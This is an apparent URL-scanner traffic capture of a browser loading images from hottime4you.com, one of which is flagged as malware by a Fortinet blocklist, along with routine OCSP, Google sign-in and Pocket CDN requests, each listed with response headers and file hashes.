Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 61392
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9k2GnTmo6t%2F2dH7RuQKX355Yuhk86gAIeLDIVC07gx8lZQfnmndch9UCQAg75RkWCtjGelnRPbz6YVuTcowNa%2BMUjArhlDhrAN6utYMXyTzbaas53%2BohpOnXFDLeqtOrbjI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d027f470afe-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   61392
Md5:    9502e70fcfd8acca4d0510286eba3bd8
Sha1:   1a4243f43e7212489c8ac5ecd57e74fefed98d96
Sha256: 3dc39eeeb917cdc0e57b6241c4df77b4d9103b0f2dc69771d7a659f0b35912ba
                                        
GET /ol/all/de/ms/25-687828/images/23.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 61988
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:29 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o1yWAOCGpAwPCEJyOzggmnhwm93xXEiXxRfs4wD%2BNlgnVZIdrNNLQsCoHWfXpYkX%2FYYhA9fzK5F1aZm%2Fa8A%2BF29CSD8F9dDzsm93%2BAOE6lsmxC1BIuhgJJSUNlcNIzZwtSc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d028808b4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   61988
Md5:    da384da949049318f5e2666fdd5944e8
Sha1:   666ac1ed92f2134d2ed7f15a6361306f1b21b146
Sha256: 417d52172fecfb675aafb6dd55a7a6c0fb166d2045ecb7a6c0447673b837a7f7
                                        
GET /ol/all/de/ms/25-687828/images/35.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 65676
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sQ%2F23LDUwwZ72XLuInR3F9jB8QFgdBa52no1vm654y%2FFyJmjfh4Uh6ajIqLSQZHhT%2B0WS6BN6J2XFt3jmLZz5nxLEUVF73Run9PIy7kKZ45i5nxuaUlz5mWM%2FG7UW6GQoA0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d02ab98b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   65676
Md5:    fd680f2add1ba478d3138793153a8a15
Sha1:   3a0f15277750d45fc7ec66ac0fa7fece5933b688
Sha256: 50bbc3f2dbf0158911cad9742eea7d0c54a8eef64febcec25881f955a244c7e7
                                        
GET /ol/all/de/ms/25-687828/images/fremdgehen69_com.png?506693 HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 1240
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:32 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A%2FcOSdnsUbR0Ff7cjocXLDlSpchQPBK2QPyfK3h3nHXwjL3ERY52GtzOULFnRCva%2FZ0voNq5gMf2pQKD9ThXKEjUSPCKPeXMPUFzgqzeAnib88agCbLPFq4jmHvukGsfLNU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d03998bb4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced\012- data
Size:   1240
Md5:    42b5a1de339f60bc62983337edc85f0a
Sha1:   10c3cb6655538193f1988123e9fd5f9fda7915fe
Sha256: 0387e0d953b13b879873233510f927697c7a598c82f22b3edf19a5c8d21469cf

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100 HTTP/1.1
Host: lh3.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.142
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
location: https://accounts.google.com/ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en
cache-control: private
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Tue, 04 Oct 2022 07:45:55 GMT
server: fife
content-length: 337
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF, LF line terminators
Size:   337
Md5:    66a43eafe19fd2e9782007272dd06ced
Sha1:   9d5112f8b4482ef224d10b0d0a17bfaf053e8e23
Sha256: f432da756645f1aa0bdfff17c86556d7343c5ae482f941597552d9701560d6bb
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Tue, 04 Oct 2022 07:45:55 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S1728465341%3A1664869555910079&continue=https%3A%2F%2Flh3.google.com%2Fu%2F0%2Fd%2F1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQDHYWo4lWoJZtUxa6xluLoa-HBEwbqzVuiyH4jecC_Tbm9IR9DEKuHonBBjrkQHeOwhu4ogvQgp-w
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-security-policy: script-src 'nonce-oaHFazzJ6Cge39-U29_MsA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 411
server: GSE
set-cookie: __Host-GAPS=1:bEsgXtWwqNXRvFAewcG38pFgA-RDtg:r7pShI-i01_7Sbk8;Path=/;Expires=Thu, 03-Oct-2024 07:45:55 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (386)
Size:   411
Md5:    54f41954005c1195d59a0b4e3842faaf
Sha1:   30b867ef5dd8d4de8a10c51382809c102b3b77fd
Sha256: e71265236951baaadaa58c274280a4fb4fdf47555ae31701748c0393486c9fe1
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 9917
x-amzn-requestid: 2dff93d9-795d-4885-9b82-610b0d235a82
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTGEnIAMF1zg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-117afa703663ada75627792c;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: p5nOqBojKO6S-c_DxIu8B3p-NK0pzRHkz0DOPeyv7PQt9h0x1jdtoQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:54 GMT
age: 35402
etag: "22aab05208a01ae5def4d63dc145085630f57bcb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9917
Md5:    d8c08f8066cc732de8befd6ccd629a95
Sha1:   22aab05208a01ae5def4d63dc145085630f57bcb
Sha256: f8a560a0563518d992d0bd2655d2b5c406435a18e874ca00b51374d2ff901770
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F840ae91d-bdbe-4236-ad14-27b04e390b6a.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 2761
x-amzn-requestid: 00090151-da40-48e8-98f0-a0c579fe6d1c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpI_EgdIAMFc0A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b556c-06ceb1750213c44130848bf2;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:36 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: -VI34uA9q6D2_lYs0LtkmZOKZrBKQsYX9plMuw8zwnCt_3b2ZZ1Uxg==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:46 GMT
age: 35410
etag: "0f0c8f45a22563c3c87ab7ec6279fabc96cdfb1f"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   2761
Md5:    fb7d0bdcd7cf60e39ee64d92f5694384
Sha1:   0f0c8f45a22563c3c87ab7ec6279fabc96cdfb1f
Sha256: a6dd1fade6b47e539dd42ed07d2cf58179db10fe946809f201889a1f9c4ef282
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F92f8209d-8dc3-45f5-bfb8-151edb23e30c.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 4996
x-amzn-requestid: 2f13b6ea-4426-4b3f-81be-5d8ca0278ce7
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcrokFkroAMF0XA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5969-421b4993676a68df2b43ad65;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:51:37 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0s9K75q7TzjbFBJ3vviHLcItPRb6CP2URJRYs2k9JmppyWHKvzv5hg==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:10:59 GMT
age: 34497
etag: "16f2fe758de4ebf7d654cb9669c73f030eb1fdef"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4996
Md5:    126f1f4538e5e4228a4f36d3b02e9d62
Sha1:   16f2fe758de4ebf7d654cb9669c73f030eb1fdef
Sha256: 594210beaabbc35a37d5d648836277f950e46b2d4c2eab2abde2d33beafdff37
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F481896f6-cdf2-442f-aea2-dfa2c7c45f77.png HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 8738
x-amzn-requestid: ede4db78-f2ab-4226-a855-dc7373978dfb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTFrBoAMFR3w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-2776543e774f0016329ddade;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: c9bu34_KooZB6Z4d8xXGnsd9jZ7lPl3yIo9II1Dm_2YVId3l9-7n-w==
via: 1.1 00f0a41f749793b9dd653153037c957e.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:46 GMT
age: 35410
etag: "d830b94bea3b5698e5192a7ea05f90b25b2f9cc9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8738
Md5:    d5745f8e3528f481ae2acf05b4abd3d0
Sha1:   d830b94bea3b5698e5192a7ea05f90b25b2f9cc9
Sha256: 313e11915f0869a608c830637b9dfd236ff28a8fb3354c3cc8748816b0ee18b0
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 8308
x-amzn-requestid: 35cc0acc-ac90-4f36-a976-c61c34cfe4fe
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqNXG3mIAMFujg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5722-112061742493dd5255c3fb00;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:41:54 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: VeeA3FQIKbAt5xmPr99k9gQjGbbwrRLM1lFYWaVIO3TCVM19GUKJaA==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:57:01 GMT
age: 35335
etag: "5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8308
Md5:    59c6121e6f6cb833939e12585aca131e
Sha1:   5cc38c9cfe6a2ade7a1d8ee272c4eda47c35f5df
Sha256: 88b8a458ad437bf40d154b21d844ba56530ae05c2f42b417cfb0e6cffcb294e5
                                        
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F180dee10-1cde-4fbe-8a74-62b7b3bdb1e2.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
server: nginx
content-length: 6315
x-amzn-requestid: 6aa75b16-32e4-48a7-9fb0-9e3d5528c2d5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
